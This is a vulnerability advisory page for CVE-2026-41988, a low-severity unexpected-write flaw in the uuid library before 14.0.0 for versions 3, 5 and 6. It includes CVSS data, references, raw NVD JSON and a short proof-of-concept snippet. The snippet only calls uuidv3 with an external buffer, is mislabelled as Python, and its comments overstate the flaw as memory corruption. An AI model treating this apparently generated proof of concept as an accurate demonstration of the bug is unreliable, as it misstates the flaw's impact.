CVE-2026-41988

Description

uuid before 14.0.0 can make unexpected writes when external output buffers are used, and the UUID version is 3, 5, or 6. In particular, UUID version 4, which is very commonly used, is unaffected by this issue.

CVSS Details

CVSS Score

3.2

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

uuid < 14.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const { v3: uuidv3 } = require('uuid');

// Vulnerable scenario: using an external buffer with version 3, 5, or 6
// Create a buffer to simulate the output target
const buffer = Buffer.alloc(16);
try {
    // Define namespace and name for v3 generation
    const MY_NAMESPACE = '1b671a64-40d5-491e-99b0-da01ff1f3341';
    const name = 'example.com';
    
    // Trigger the vulnerable function
    // In uuid < 14.0.0, passing an external buffer for v3/v5/v6
    // may lead to unexpected memory writes.
    const id = uuidv3(name, MY_NAMESPACE, buffer);
    console.log('Generated UUID:', id);
} catch (e) {
    console.error('Potential crash or error:', e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41988
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41988
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41988/
[4] VulDB https://vuldb.com/cve/CVE-2026-41988
[5] https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34
[6] https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq
[7] https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41988", "sourceIdentifier": "[email protected]", "published": "2026-04-23T05:16:05.613", "lastModified": "2026-04-24T14:50:56.203", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "uuid before 14.0.0 can make unexpected writes when external output buffers are used, and the UUID version is 3, 5, or 6. In particular, UUID version 4, which is very commonly used, is unaffected by this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 3.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-670"}]}], "references": [{"url": "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "source": "[email protected]"}, {"url": "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "source": "[email protected]"}, {"url": "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}